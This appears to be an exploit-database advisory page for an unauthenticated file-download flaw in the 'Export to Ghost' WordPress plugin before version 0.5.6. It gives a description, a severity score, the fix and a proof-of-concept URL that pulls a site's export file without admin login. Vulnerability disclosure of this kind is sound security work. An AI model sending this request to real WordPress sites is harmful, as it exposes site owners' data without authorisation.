header-logo
Suggest Exploit
vendor:
Ghost
by:
Josh Brody
7,5
CVSS
HIGH
Unauthenticated File Download
284
CWE
Product Name: Ghost
Affected Version From: < 0.5.6
Affected Version To: < 0.5.6
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:ghost
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

WordPress Export to Ghost Unrestricted Export Download

Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.

Mitigation:

Update to version 0.5.6
Source

Exploit-DB raw data:

# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps
 
1. Description
   
Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
   
2. Proof of Concept

http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file

File will be downloaded.
   
3. Solution:

Update to version 0.5.6

https://downloads.wordpress.org/plugin/ghost.0.5.6.zip

Navigation

Suggest Exploit

Services By CQR